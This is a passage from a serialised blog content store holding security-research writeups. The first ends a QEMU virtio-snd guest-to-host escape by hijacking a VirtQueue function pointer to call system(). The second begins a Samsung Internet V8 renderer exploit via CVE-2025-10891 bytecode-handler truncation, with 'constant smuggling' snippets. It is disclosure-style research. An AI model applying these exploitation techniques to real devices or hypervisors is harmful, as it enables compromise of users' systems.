vq",{"type":24,"tag":301,"props":138333,"children":138334},{"style":359},[138335],{"type":30,"value":882},{"type":24,"tag":301,"props":138337,"children":138338},{"style":314},[138339],{"type":30,"value":138261},{"type":24,"tag":301,"props":138341,"children":138342},{"style":359},[138343],{"type":30,"value":138344},"(vdev, vq);\n",{"type":24,"tag":301,"props":138346,"children":138347},{"class":303,"line":476},[138348],{"type":24,"tag":301,"props":138349,"children":138350},{"emptyLinePlaceholder":16},[138351],{"type":30,"value":341},{"type":24,"tag":301,"props":138353,"children":138354},{"class":303,"line":495},[138355],{"type":24,"tag":301,"props":138356,"children":138357},{"style":359},[138358],{"type":30,"value":5858},{"type":24,"tag":301,"props":138360,"children":138361},{"class":303,"line":504},[138362],{"type":24,"tag":301,"props":138363,"children":138364},{"style":359},[138365],{"type":30,"value":501},{"type":24,"tag":301,"props":138367,"children":138368},{"class":303,"line":512},[138369],{"type":24,"tag":301,"props":138370,"children":138371},{"style":359},[138372],{"type":30,"value":698},{"type":24,"tag":32,"props":138374,"children":138375},{},[138376,138378,138383,138385,138390,138392,138398,138400,138405,138406,138411,138413,138418],{"type":30,"value":138377},"This means that if we free the known-address chunk and replace it with a ",{"type":24,"tag":145,"props":138379,"children":138381},{"className":138380},[],[138382],{"type":30,"value":131213},{"type":30,"value":138384}," - which is straightforward, since we control the buffer allocation size through the ",{"type":24,"tag":145,"props":138386,"children":138388},{"className":138387},[],[138389],{"type":30,"value":130802},{"type":30,"value":138391}," iovec - we can use the arbitrary read primitive to read its ",{"type":24,"tag":145,"props":138393,"children":138395},{"className":138394},[],[138396],{"type":30,"value":138397},".vq",{"type":30,"value":138399}," pointer, then follow that pointer to leak ",{"type":24,"tag":145,"props":138401,"children":138403},{"className":138402},[],[138404],{"type":30,"value":138153},{"type":30,"value":22839},{"type":24,"tag":145,"props":138407,"children":138409},{"className":138408},[],[138410],{"type":30,"value":138055},{"type":30,"value":138412}," structure. In our case, that field points to ",{"type":24,"tag":145,"props":138414,"children":138416},{"className":138415},[],[138417],{"type":30,"value":130455},{"type":30,"value":138419},", which gives us QEMU's base address.",{"type":24,"tag":32,"props":138421,"children":138422},{},[138423,138425,138430],{"type":30,"value":138424},"From there, we can use the arbitrary read primitive once more to read a resolved entry from QEMU's GOT, leaking a libc address. With that, we can compute the address of ",{"type":24,"tag":145,"props":138426,"children":138428},{"className":138427},[],[138429],{"type":30,"value":9165},{"type":30,"value":206},{"type":24,"tag":80,"props":138432,"children":138434},{"id":138433},"rip-control",[138435],{"type":30,"value":138436},"RIP Control",{"type":24,"tag":32,"props":138438,"children":138439},{},[138440,138442,138447,138449,138455],{"type":30,"value":138441},"At this point, we have everything we need: an arbitrary read/write primitive, a QEMU code leak, and the address of ",{"type":24,"tag":145,"props":138443,"children":138445},{"className":138444},[],[138446],{"type":30,"value":9165},{"type":30,"value":138448},". To hijack control flow, we do not need to look far - we just described a function pointer on the heap at a known address: ",{"type":24,"tag":145,"props":138450,"children":138452},{"className":138451},[],[138453],{"type":30,"value":138454},"VirtQueue.handle_output",{"type":30,"value":206},{"type":24,"tag":32,"props":138457,"children":138458},{},[138459,138461,138466,138468,138473,138475,138480],{"type":30,"value":138460},"We overwrite ",{"type":24,"tag":145,"props":138462,"children":138464},{"className":138463},[],[138465],{"type":30,"value":138153},{"type":30,"value":138467}," with the address of ",{"type":24,"tag":145,"props":138469,"children":138471},{"className":138470},[],[138472],{"type":30,"value":9165},{"type":30,"value":138474}," and write the command string we want to execute into memory using our arbitrary write. Then we overwrite ",{"type":24,"tag":145,"props":138476,"children":138478},{"className":138477},[],[138479],{"type":30,"value":138161},{"type":30,"value":138481}," with the address of that command string, so it is passed as the first argument.",{"type":24,"tag":32,"props":138483,"children":138484},{},[138485,138487,138493,138495,138501,138503,138509],{"type":30,"value":138486},"Then, we simply notify the virtqueue from the guest. QEMU enters ",{"type":24,"tag":145,"props":138488,"children":138490},{"className":138489},[],[138491],{"type":30,"value":138492},"virtio_queue_notify_vq",{"type":30,"value":138494},", which calls ",{"type":24,"tag":145,"props":138496,"children":138498},{"className":138497},[],[138499],{"type":30,"value":138500},"vq->handle_output(vq->vdev)",{"type":30,"value":138502}," - or, after our overwrites, ",{"type":24,"tag":145,"props":138504,"children":138506},{"className":138505},[],[138507],{"type":30,"value":138508},"system(command)",{"type":30,"value":206},{"type":24,"tag":32,"props":138511,"children":138512},{},[138513,138515,138521,138523],{"type":30,"value":138514},"Finally, with all of this, we achieve a reliable guest-to-host escape and execute ",{"type":24,"tag":145,"props":138516,"children":138518},{"className":138517},[],[138519],{"type":30,"value":138520},"gnome-calculator",{"type":30,"value":138522}," on the host system:\n",{"type":24,"tag":37724,"props":138524,"children":138525},{},[],{"type":24,"tag":138527,"props":138528,"children":138535},"tweet-card",{"author-name":138529,"date":138530,"duration":138531,"handle":138532,"media-mime-type":9646,"media-src":138533,"media-type":9634,"tweet-url":138534},"OtterSec","March 5, 2026","0:12","@osec_io","/posts/virtio-snd-qemu-0day/demo.mp4","https://x.com/osec_io/status/2029643325125390550",[138536,138541,138546],{"type":24,"tag":32,"props":138537,"children":138538},{},[138539],{"type":30,"value":138540},"We recently achieved guest-to-host escape by exploiting a QEMU 0day.",{"type":24,"tag":32,"props":138542,"children":138543},{},[138544],{"type":30,"value":138545},"We’ll share details on a new technique leveraging the latest glibc allocator behavior and what we believe is a novel QEMU-specific heap spray/RIP-control primitive.",{"type":24,"tag":32,"props":138547,"children":138548},{},[138549],{"type":30,"value":138550},"Writeup coming next week.",{"type":24,"tag":37724,"props":138552,"children":138553},{},[],{"type":24,"tag":32,"props":138555,"children":138556},{},[138557,138559,138565,138567,138573],{"type":30,"value":138558},"The final exploit, targeting QEMU commit ",{"type":24,"tag":145,"props":138560,"children":138562},{"className":138561},[],[138563],{"type":30,"value":138564},"ece408818d27f745ef1b05fb3cc99a1e7a5bf580",{"type":30,"value":138566}," (Feb 13, 2026) and the latest glibc 2.43, can be found ",{"type":24,"tag":188,"props":138568,"children":138571},{"href":138569,"rel":138570},"https://github.com/otter-sec/qemu-escape",[192],[138572],{"type":30,"value":5193},{"type":30,"value":206},{"type":24,"tag":32,"props":138575,"children":138576},{},[138577,138579,138586],{"type":30,"value":138578},"Special thanks to ",{"type":24,"tag":188,"props":138580,"children":138583},{"href":138581,"rel":138582},"https://www.willsroot.io/",[192],[138584],{"type":30,"value":138585},"William Liu",{"type":30,"value":138587}," for proofreading this post and helping us polish it before publication.",{"type":24,"tag":43,"props":138589,"children":138590},{"id":9652},[138591],{"type":30,"value":9655},{"type":24,"tag":32,"props":138593,"children":138594},{},[138595],{"type":30,"value":138596},"Starting from a heap overflow where the written bytes are effectively random, we showed how careful heap grooming and a favorable change in glibc 2.43's allocator can turn even a single byte of uncontrolled corruption into a reliable guest-to-host escape.",{"type":24,"tag":32,"props":138598,"children":138599},{},[138600],{"type":30,"value":138601},"More broadly, this exploit is a reminder that weak-looking primitives should not be dismissed too quickly - with the right heap layout and target, even highly constrained corruption can be enough.",{"type":24,"tag":9672,"props":138603,"children":138604},{},[138605],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":138607},[138608,138611,138614,138623],{"id":130351,"depth":320,"text":130364,"children":138609},[138610],{"id":130372,"depth":335,"text":130375},{"id":130396,"depth":320,"text":130399,"children":138612},[138613],{"id":130410,"depth":335,"text":130410},{"id":106804,"depth":320,"text":106807,"children":138615},[138616,138617,138618,138619,138620,138621,138622],{"id":132997,"depth":335,"text":133000},{"id":134519,"depth":335,"text":134522},{"id":135313,"depth":335,"text":135316},{"id":135717,"depth":335,"text":135720},{"id":135933,"depth":335,"text":135936},{"id":136139,"depth":335,"text":136142},{"id":138433,"depth":335,"text":138436},{"id":9652,"depth":320,"text":9655},"content:blog:2026-03-17-virtio-snd-qemu-hypervisor-escape.md","blog/2026-03-17-virtio-snd-qemu-hypervisor-escape.md","blog/2026-03-17-virtio-snd-qemu-hypervisor-escape",{"_path":138628,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":138629,"description":138630,"date":138631,"author":138632,"image":138635,"isFeatured":16,"onBlogPage":16,"tags":138637,"body":138640,"_type":9700,"_id":148540,"_source":9702,"_file":148541,"_stem":148542,"_extension":9705},"/blog/2026-04-01-patch-gap-to-mobile-renderer-rce","Patch Gap to Mobile Renderer RCE: Pwning Samsung Internet's V8 on the Galaxy S25","Samsung Internet on the Galaxy S25 shipped a six-month-old version of V8, exposing it to publicly known bugs. Learn how we exploited a bytecode interpreter vulnerability to achieve renderer RCE and universal XSS in the browser.","2026-04-01T12:00:00.000Z",[11,138633,138634],"jamie","william",{"src":138636,"width":14,"height":15},"/posts/mobile-renderer-rce/title.png",[138638,138639],"RCE","mobile",{"type":21,"children":138641,"toc":148520},[138642,138646,138651,138665,138671,138685,138705,138713,138726,138734,138747,138753,138766,138780,138786,138800,138903,138908,138916,138921,138926,138947,139025,139033,139052,139065,139071,139077,139091,139207,139212,139217,139225,139230,139238,139266,139295,139307,139483,139488,139496,139515,139528,139534,139554,139568,139573,139578,139606,139641,139710,139716,139738,139743,139751,139764,139769,139777,139782,139821,139827,139840,139845,140022,140032,140040,140060,140084,140097,140103,140108,140750,140755,140763,140805,142793,142798,142806,142812,142845,142863,143033,143091,143116,143210,143215,144006,144011,144019,144030,146074,146079,146087,146093,146115,146129,146142,146154,146184,146189,146630,146658,146765,146782,146939,146944,146956,147252,147278,147301,147433,147445,147450,147602,147638,147651,147656,147777,147818,147895,147900,148474,148480,148492,148502,148506,148511,148516],{"type":24,"tag":43,"props":138643,"children":138644},{"id":35771},[138645],{"type":30,"value":35774},{"type":24,"tag":32,"props":138647,"children":138648},{},[138649],{"type":30,"value":138650},"The supply chain dependency in today's software landscape is extremely complex. Any vulnerability in a core library creates an exploitable window for its dependents - maintainers either fall behind on the exhausting update schedule, backport incorrectly, or even forget about it entirely.",{"type":24,"tag":32,"props":138652,"children":138653},{},[138654,138656,138663],{"type":30,"value":138655},"One such example is V8, a JavaScript engine used ubiquitously in Chromium and Node.js-based software. In collaboration with the ",{"type":24,"tag":188,"props":138657,"children":138660},{"href":138658,"rel":138659},"https://cor.team",[192],[138661],{"type":30,"value":138662},"Crusaders of Rust",{"type":30,"value":138664}," Security Research Group, we decided to analyze the version of V8 in Samsung Internet (the default browser on Samsung phones) on a Samsung Galaxy S25 in hopes of an n-day exploitation opportunity.",{"type":24,"tag":80,"props":138666,"children":138668},{"id":138667},"finding-the-v8-version",[138669],{"type":30,"value":138670},"Finding the V8 Version",{"type":24,"tag":32,"props":138672,"children":138673},{},[138674,138676,138683],{"type":30,"value":138675},"We started by pulling Samsung Internet's APK from the device over ",{"type":24,"tag":188,"props":138677,"children":138680},{"href":138678,"rel":138679},"https://developer.android.com/tools/adb",[192],[138681],{"type":30,"value":138682},"adb",{"type":30,"value":138684}," and inspecting the libraries it shipped with.",{"type":24,"tag":32,"props":138686,"children":138687},{},[138688,138690,138696,138698,138704],{"type":30,"value":138689},"After extracting the APK, we searched the ",{"type":24,"tag":145,"props":138691,"children":138693},{"className":138692},[],[138694],{"type":30,"value":138695},"lib/",{"type":30,"value":138697}," directory for ",{"type":24,"tag":145,"props":138699,"children":138701},{"className":138700},[],[138702],{"type":30,"value":138703},"v8::*",{"type":30,"value":8712},{"type":24,"tag":291,"props":138706,"children":138708},{"code":138707},"$ grep -r 'v8::' lib/\ngrep: lib/arm64-v8a/libterrace.so: binary file matches\n",[138709],{"type":24,"tag":145,"props":138710,"children":138711},{"__ignoreMap":7},[138712],{"type":30,"value":138707},{"type":24,"tag":32,"props":138714,"children":138715},{},[138716,138718,138724],{"type":30,"value":138717},"Only one file matched our search: ",{"type":24,"tag":145,"props":138719,"children":138721},{"className":138720},[],[138722],{"type":30,"value":138723},"libterrace.so",{"type":30,"value":138725},". We then loaded it into a decompiler to inspect it more closely, which is where we found the bundled V8 version:",{"type":24,"tag":32,"props":138727,"children":138728},{},[138729],{"type":24,"tag":177,"props":138730,"children":138733},{"alt":138731,"src":138732},"image1","/posts/mobile-renderer-rce/image1.png",[],{"type":24,"tag":32,"props":138735,"children":138736},{},[138737,138739,138745],{"type":30,"value":138738},"Surprisingly, this ",{"type":24,"tag":145,"props":138740,"children":138742},{"className":138741},[],[138743],{"type":30,"value":138744},"13.6.233.10",{"type":30,"value":138746}," version was already six months old at the time, with multiple publicly known bugs affecting it.",{"type":24,"tag":80,"props":138748,"children":138750},{"id":138749},"choosing-the-bug",[138751],{"type":30,"value":138752},"Choosing the Bug",{"type":24,"tag":32,"props":138754,"children":138755},{},[138756,138758,138764],{"type":30,"value":138757},"We were able to trigger a couple of bugs on our locally compiled ",{"type":24,"tag":145,"props":138759,"children":138761},{"className":138760},[],[138762],{"type":30,"value":138763},"d8",{"type":30,"value":138765}," matching the target version. One of them was CVE-2025-5419 - a store-store elimination bug that we managed to get working on the device. However, exploitation required heap spraying, which would present significant stability issues when porting to the phone.",{"type":24,"tag":32,"props":138767,"children":138768},{},[138769,138771,138778],{"type":30,"value":138770},"Another one was ",{"type":24,"tag":188,"props":138772,"children":138775},{"href":138773,"rel":138774},"https://issuetracker.google.com/issues/443875388",[192],[138776],{"type":30,"value":138777},"CVE-2025-10891",{"type":30,"value":138779}," - a bug in the Ignition bytecode interpreter. This one was attractive as bytecode is treated as trusted under the V8 sandbox model, meaning that a separate Übercage bypass would not be required. Given this, we decided to explore this bug further.",{"type":24,"tag":43,"props":138781,"children":138783},{"id":138782},"ignition-bytecode-introduction",[138784],{"type":30,"value":138785},"Ignition Bytecode Introduction",{"type":24,"tag":32,"props":138787,"children":138788},{},[138789,138791,138798],{"type":30,"value":138790},"V8 initially compiles all JS code to a bytecode format with the ",{"type":24,"tag":188,"props":138792,"children":138795},{"href":138793,"rel":138794},"https://v8.dev/blog/ignition-interpreter",[192],[138796],{"type":30,"value":138797},"Ignition",{"type":30,"value":138799}," interpreter.\nThis is a simple register-based VM with fixed size opcodes (and prefix bytes to increase operand width). For instance:",{"type":24,"tag":291,"props":138801,"children":138803},{"code":138802,"language":38121,"meta":7,"className":38119,"style":7},"let a = 1;\nlet b = 0x0fff;\nlet c = 0x0fffffff;\nlet d = 0xffffffff;\n",[138804],{"type":24,"tag":145,"props":138805,"children":138806},{"__ignoreMap":7},[138807,138830,138854,138878],{"type":24,"tag":301,"props":138808,"children":138809},{"class":303,"line":304},[138810,138814,138818,138822,138826],{"type":24,"tag":301,"props":138811,"children":138812},{"style":348},[138813],{"type":30,"value":3258},{"type":24,"tag":301,"props":138815,"children":138816},{"style":369},[138817],{"type":30,"value":96538},{"type":24,"tag":301,"props":138819,"children":138820},{"style":385},[138821],{"type":30,"value":2537},{"type":24,"tag":301,"props":138823,"children":138824},{"style":466},[138825],{"type":30,"value":487},{"type":24,"tag":301,"props":138827,"children":138828},{"style":359},[138829],{"type":30,"value":492},{"type":24,"tag":301,"props":138831,"children":138832},{"class":303,"line":320},[138833,138837,138841,138845,138850],{"type":24,"tag":301,"props":138834,"children":138835},{"style":348},[138836],{"type":30,"value":3258},{"type":24,"tag":301,"props":138838,"children":138839},{"style":369},[138840],{"type":30,"value":97410},{"type":24,"tag":301,"props":138842,"children":138843},{"style":385},[138844],{"type":30,"value":2537},{"type":24,"tag":301,"props":138846,"children":138847},{"style":466},[138848],{"type":30,"value":138849}," 0x0fff",{"type":24,"tag":301,"props":138851,"children":138852},{"style":359},[138853],{"type":30,"value":492},{"type":24,"tag":301,"props":138855,"children":138856},{"class":303,"line":335},[138857,138861,138865,138869,138874],{"type":24,"tag":301,"props":138858,"children":138859},{"style":348},[138860],{"type":30,"value":3258},{"type":24,"tag":301,"props":138862,"children":138863},{"style":369},[138864],{"type":30,"value":1494},{"type":24,"tag":301,"props":138866,"children":138867},{"style":385},[138868],{"type":30,"value":2537},{"type":24,"tag":301,"props":138870,"children":138871},{"style":466},[138872],{"type":30,"value":138873}," 0x0fffffff",{"type":24,"tag":301,"props":138875,"children":138876},{"style":359},[138877],{"type":30,"value":492},{"type":24,"tag":301,"props":138879,"children":138880},{"class":303,"line":344},[138881,138885,138890,138894,138899],{"type":24,"tag":301,"props":138882,"children":138883},{"style":348},[138884],{"type":30,"value":3258},{"type":24,"tag":301,"props":138886,"children":138887},{"style":369},[138888],{"type":30,"value":138889}," d",{"type":24,"tag":301,"props":138891,"children":138892},{"style":385},[138893],{"type":30,"value":2537},{"type":24,"tag":301,"props":138895,"children":138896},{"style":466},[138897],{"type":30,"value":138898}," 0xffffffff",{"type":24,"tag":301,"props":138900,"children":138901},{"style":359},[138902],{"type":30,"value":492},{"type":24,"tag":32,"props":138904,"children":138905},{},[138906],{"type":30,"value":138907},"compiles to",{"type":24,"tag":291,"props":138909,"children":138911},{"code":138910}," # Load the Smi `1` into the accumulator\n 0 : 0d 01 LdaSmi [1]\n # Store it to register 0\n 2 : ce Star0\n # Load the 2-byte Smi `0xfff` into acc\n 3 : 00 0d ff 0f LdaSmi.Wide [4095]\n # Store it to register 1\n 7 : cd Star1\n # Load the 4-byte Smi `0xfffffff` into acc\n 8 : 01 0d ff ff ff 0f LdaSmi.ExtraWide [268435455]\n # Store it to register 2\n14 : cc Star2\n# `0xffffffff` doesn't fit into an Smi, so a `HeapNumber` is allocated in the function's constant pool and loaded\n15 : 13 00 LdaConstant [0]\n# Store it to register 3\n17 : cb Star3\n18 : 0e LdaUndefined\n19 : b3 Return\n",[138912],{"type":24,"tag":145,"props":138913,"children":138914},{"__ignoreMap":7},[138915],{"type":30,"value":138910},{"type":24,"tag":32,"props":138917,"children":138918},{},[138919],{"type":30,"value":138920},"Ignition bytecode is then passed through the Sparkplug, Maglev, and Turbofan JIT compilers depending on the required amount of optimization. Yes, V8 has FOUR compilers, all so that slop devs can continue \"engineering\" their RAM-hungry, CPU-draining web apps that have plagued the modern internet.",{"type":24,"tag":80,"props":138922,"children":138924},{"id":138923},"cve-2025-10891",[138925],{"type":30,"value":138777},{"type":24,"tag":32,"props":138927,"children":138928},{},[138929,138931,138937,138939,138945],{"type":30,"value":138930},"The bug is in the handling of try/catch blocks. These are encoded in a function as a list of ",{"type":24,"tag":145,"props":138932,"children":138934},{"className":138933},[],[138935],{"type":30,"value":138936},"[start, end) => handler",{"type":30,"value":138938}," offsets - if an exception is thrown in the given bytecode address range, ",{"type":24,"tag":145,"props":138940,"children":138942},{"className":138941},[],[138943],{"type":30,"value":138944},"handler",{"type":30,"value":138946}," is jumped to.",{"type":24,"tag":291,"props":138948,"children":138950},{"code":138949,"language":38121,"meta":7,"className":38119,"style":7},"try {\n throw 1;\n} catch {\n let b = 2;\n}\n",[138951],{"type":24,"tag":145,"props":138952,"children":138953},{"__ignoreMap":7},[138954,138965,138980,138995,139018],{"type":24,"tag":301,"props":138955,"children":138956},{"class":303,"line":304},[138957,138961],{"type":24,"tag":301,"props":138958,"children":138959},{"style":308},[138960],{"type":30,"value":55067},{"type":24,"tag":301,"props":138962,"children":138963},{"style":359},[138964],{"type":30,"value":3035},{"type":24,"tag":301,"props":138966,"children":138967},{"class":303,"line":320},[138968,138972,138976],{"type":24,"tag":301,"props":138969,"children":138970},{"style":308},[138971],{"type":30,"value":41949},{"type":24,"tag":301,"props":138973,"children":138974},{"style":466},[138975],{"type":30,"value":487},{"type":24,"tag":301,"props":138977,"children":138978},{"style":359},[138979],{"type":30,"value":492},{"type":24,"tag":301,"props":138981,"children":138982},{"class":303,"line":335},[138983,138987,138991],{"type":24,"tag":301,"props":138984,"children":138985},{"style":359},[138986],{"type":30,"value":53610},{"type":24,"tag":301,"props":138988,"children":138989},{"style":308},[138990],{"type":30,"value":55146},{"type":24,"tag":301,"props":138992,"children":138993},{"style":359},[138994],{"type":30,"value":3035},{"type":24,"tag":301,"props":138996,"children":138997},{"class":303,"line":344},[138998,139002,139006,139010,139014],{"type":24,"tag":301,"props":138999,"children":139000},{"style":348},[139001],{"type":30,"value":14671},{"type":24,"tag":301,"props":139003,"children":139004},{"style":369},[139005],{"type":30,"value":97410},{"type":24,"tag":301,"props":139007,"children":139008},{"style":385},[139009],{"type":30,"value":2537},{"type":24,"tag":301,"props":139011,"children":139012},{"style":466},[139013],{"type":30,"value":469},{"type":24,"tag":301,"props":139015,"children":139016},{"style":359},[139017],{"type":30,"value":492},{"type":24,"tag":301,"props":139019,"children":139020},{"class":303,"line":401},[139021],{"type":24,"tag":301,"props":139022,"children":139023},{"style":359},[139024],{"type":30,"value":698},{"type":24,"tag":291,"props":139026,"children":139028},{"code":139027}," 0 : 1b ff f8 Mov \u003Ccontext>, r1\n # Start of try block\n # ---------------------------------\n 3 : 0d 01 LdaSmi [1]\n 5 : b1 Throw\n # ---------------------------------\n 6 : 10 LdaTheHole\n 7 : b0 SetPendingMessage\n # Start of catch handler\n 8 : 0d 02 LdaSmi [2]\n10 : ce Star0\n11 : 0e LdaUndefined\n12 : b3 Return\nHandler Table (size = 16)\n from to hdlr (prediction, data)\n ( 3, 6) -> 6 (prediction=1, data=1)\n",[139029],{"type":24,"tag":145,"props":139030,"children":139031},{"__ignoreMap":7},[139032],{"type":30,"value":139027},{"type":24,"tag":32,"props":139034,"children":139035},{},[139036,139038,139043,139045,139050],{"type":30,"value":139037},"However, the ",{"type":24,"tag":145,"props":139039,"children":139041},{"className":139040},[],[139042],{"type":30,"value":138944},{"type":30,"value":139044}," offset is stored in a 28-bit bitfield. If the address of the ",{"type":24,"tag":145,"props":139046,"children":139048},{"className":139047},[],[139049],{"type":30,"value":55146},{"type":30,"value":139051}," block does not fit within 28 bits, it will be silently truncated. This will lead to a jump into a completely different part of the code - even in the middle of an instruction.",{"type":24,"tag":32,"props":139053,"children":139054},{},[139055,139057,139063],{"type":30,"value":139056},"One easy way to generate a large enough function, as suggested in the initial report, is to emit many ",{"type":24,"tag":145,"props":139058,"children":139060},{"className":139059},[],[139061],{"type":30,"value":139062},"yield*",{"type":30,"value":139064}," statements, as that drastically increases the size of the Ignition bytecode.",{"type":24,"tag":43,"props":139066,"children":139068},{"id":139067},"exploitation",[139069],{"type":30,"value":139070},"Exploitation",{"type":24,"tag":80,"props":139072,"children":139074},{"id":139073},"constant-smuggling",[139075],{"type":30,"value":139076},"Constant Smuggling",{"type":24,"tag":32,"props":139078,"children":139079},{},[139080,139082,139089],{"type":30,"value":139081},"Our initial approach to exploitation was inspired by the 'shellcode smuggling' ",{"type":24,"tag":188,"props":139083,"children":139086},{"href":139084,"rel":139085},"https://blog.exodusintel.com/2024/01/19/google-chrome-v8-cve-2024-0517-out-of-bounds-write-code-execution/",[192],[139087],{"type":30,"value":139088},"technique",{"type":30,"value":139090}," - when arbitrary read-write is achieved in browser exploits, we can often JIT compile a function like this:",{"type":24,"tag":291,"props":139092,"children":139094},{"code":139093,"language":38121,"meta":7,"className":38119,"style":7},"let a = -9.255963134931783e61;\nlet b = -9.255963134931783e61;\nlet c = -9.255963134931783e61;\nlet d = -9.255963134931783e61;\n",[139095],{"type":24,"tag":145,"props":139096,"children":139097},{"__ignoreMap":7},[139098,139126,139153,139180],{"type":24,"tag":301,"props":139099,"children":139100},{"class":303,"line":304},[139101,139105,139109,139113,139117,139122],{"type":24,"tag":301,"props":139102,"children":139103},{"style":348},[139104],{"type":30,"value":3258},{"type":24,"tag":301,"props":139106,"children":139107},{"style":369},[139108],{"type":30,"value":96538},{"type":24,"tag":301,"props":139110,"children":139111},{"style":385},[139112],{"type":30,"value":2537},{"type":24,"tag":301,"props":139114,"children":139115},{"style":385},[139116],{"type":30,"value":3407},{"type":24,"tag":301,"props":139118,"children":139119},{"style":466},[139120],{"type":30,"value":139121},"9.255963134931783e61",{"type":24,"tag":301,"props":139123,"children":139124},{"style":359},[139125],{"type":30,"value":492},{"type":24,"tag":301,"props":139127,"children":139128},{"class":303,"line":320},[139129,139133,139137,139141,139145,139149],{"type":24,"tag":301,"props":139130,"children":139131},{"style":348},[139132],{"type":30,"value":3258},{"type":24,"tag":301,"props":139134,"children":139135},{"style":369},[139136],{"type":30,"value":97410},{"type":24,"tag":301,"props":139138,"children":139139},{"style":385},[139140],{"type":30,"value":2537},{"type":24,"tag":301,"props":139142,"children":139143},{"style":385},[139144],{"type":30,"value":3407},{"type":24,"tag":301,"props":139146,"children":139147},{"style":466},[139148],{"type":30,"value":139121},{"type":24,"tag":301,"props":139150,"children":139151},{"style":359},[139152],{"type":30,"value":492},{"type":24,"tag":301,"props":139154,"children":139155},{"class":303,"line":335},[139156,139160,139164,139168,139172,139176],{"type":24,"tag":301,"props":139157,"children":139158},{"style":348},[139159],{"type":30,"value":3258},{"type":24,"tag":301,"props":139161,"children":139162},{"style":369},[139163],{"type":30,"value":1494},{"type":24,"tag":301,"props":139165,"children":139166},{"style":385},[139167],{"type":30,"value":2537},{"type":24,"tag":301,"props":139169,"children":139170},{"style":385},[139171],{"type":30,"value":3407},{"type":24,"tag":301,"props":139173,"children":139174},{"style":466},[139175],{"type":30,"value":139121},{"type":24,"tag":301,"props":139177,"children":139178},{"style":359},[139179],{"type":30,"value":492},{"type":24,"tag":301,"props":139181,"children":139182},{"class":303,"line":344},[139183,139187,139191,139195,139199,139203],{"type":24,"tag":301,"props":139184,"children":139185},{"style":348},[139186],{"type":30,"value":3258},{"type":24,"tag":301,"props":139188,"children":139189},{"style":369},[139190],{"type":30,"value":138889},{"type":24,"tag":301,"props":139192,"children":139193},{"style":385},[139194],{"type":30,"value":2537},{"type":24,"tag":301,"props":139196,"children":139197},{"style":385},[139198],{"type":30,"value":3407},{"type":24,"tag":301,"props":139200,"children":139201},{"style":466},[139202],{"type":30,"value":139121},{"type":24,"tag":301,"props":139204,"children":139205},{"style":359},[139206],{"type":30,"value":492},{"type":24,"tag":32,"props":139208,"children":139209},{},[139210],{"type":30,"value":139211},"These floating-point constants will compile to 8-byte constants inside the machine code (the last 2 of which are used to jump into the next constant).",{"type":24,"tag":32,"props":139213,"children":139214},{},[139215],{"type":30,"value":139216},"We'll use a similar principle here, although much more limited. With",{"type":24,"tag":291,"props":139218,"children":139220},{"code":139219},"let a = 0x0693bebe;\n",[139221],{"type":24,"tag":145,"props":139222,"children":139223},{"__ignoreMap":7},[139224],{"type":30,"value":139219},{"type":24,"tag":32,"props":139226,"children":139227},{},[139228],{"type":30,"value":139229},"We will compile the bytecode:",{"type":24,"tag":291,"props":139231,"children":139233},{"code":139232},"01 0d be be 93 06 LdaSmi.ExtraWide\n",[139234],{"type":24,"tag":145,"props":139235,"children":139236},{"__ignoreMap":7},[139237],{"type":30,"value":139232},{"type":24,"tag":32,"props":139239,"children":139240},{},[139241,139243,139249,139251,139257,139258,139264],{"type":30,"value":139242},"We can then jump to the 3rd byte (",{"type":24,"tag":145,"props":139244,"children":139246},{"className":139245},[],[139247],{"type":30,"value":139248},"0xbe",{"type":30,"value":139250},"), and gain 2 controlled bytes of execution, followed by ",{"type":24,"tag":145,"props":139252,"children":139254},{"className":139253},[],[139255],{"type":30,"value":139256},"0x93 0x02 - 0xf",{"type":30,"value":873},{"type":24,"tag":145,"props":139259,"children":139261},{"className":139260},[],[139262],{"type":30,"value":139263},"Jump +[2-15]",{"type":30,"value":139265},") to jump into the next constant.",{"type":24,"tag":32,"props":139267,"children":139268},{},[139269,139271,139277,139279,139285,139287,139293],{"type":30,"value":139270},"Note that the jump constant will change as the subsequent store instruction becomes longer due to storing to deeper registers. Storing to registers 1-15 resulted in simple one byte ",{"type":24,"tag":145,"props":139272,"children":139274},{"className":139273},[],[139275],{"type":30,"value":139276},"StarX",{"type":30,"value":139278}," instructions, registers 16-121 resulted in two bytes ",{"type":24,"tag":145,"props":139280,"children":139282},{"className":139281},[],[139283],{"type":30,"value":139284},"Star rX",{"type":30,"value":139286}," instructions, and the next batch resulted in 4 byte ",{"type":24,"tag":145,"props":139288,"children":139290},{"className":139289},[],[139291],{"type":30,"value":139292},"Star.ExtraWide rX",{"type":30,"value":139294}," instructions.",{"type":24,"tag":32,"props":139296,"children":139297},{},[139298,139300,139306],{"type":30,"value":139299},"With these short jumps, we can actually construct a massive jump slide of constants like ",{"type":24,"tag":145,"props":139301,"children":139303},{"className":139302},[],[139304],{"type":30,"value":139305},"0x8931111",{"type":30,"value":1679},{"type":24,"tag":291,"props":139308,"children":139310},{"code":139309,"language":38121,"meta":7,"className":38119,"style":7},"let a206 = 0x8931111;\nlet a207 = 0x8931111;\nlet a208 = 0x8931111;\nlet a209 = 0x8931111;\nlet a210 = 0x8931111;\nlet a211 = 0x8931111;\nlet a212 = 0x8931111;\n",[139311],{"type":24,"tag":145,"props":139312,"children":139313},{"__ignoreMap":7},[139314,139339,139363,139387,139411,139435,139459],{"type":24,"tag":301,"props":139315,"children":139316},{"class":303,"line":304},[139317,139321,139326,139330,139335],{"type":24,"tag":301,"props":139318,"children":139319},{"style":348},[139320],{"type":30,"value":3258},{"type":24,"tag":301,"props":139322,"children":139323},{"style":369},[139324],{"type":30,"value":139325}," a206",{"type":24,"tag":301,"props":139327,"children":139328},{"style":385},[139329],{"type":30,"value":2537},{"type":24,"tag":301,"props":139331,"children":139332},{"style":466},[139333],{"type":30,"value":139334}," 0x8931111",{"type":24,"tag":301,"props":139336,"children":139337},{"style":359},[139338],{"type":30,"value":492},{"type":24,"tag":301,"props":139340,"children":139341},{"class":303,"line":320},[139342,139346,139351,139355,139359],{"type":24,"tag":301,"props":139343,"children":139344},{"style":348},[139345],{"type":30,"value":3258},{"type":24,"tag":301,"props":139347,"children":139348},{"style":369},[139349],{"type":30,"value":139350}," 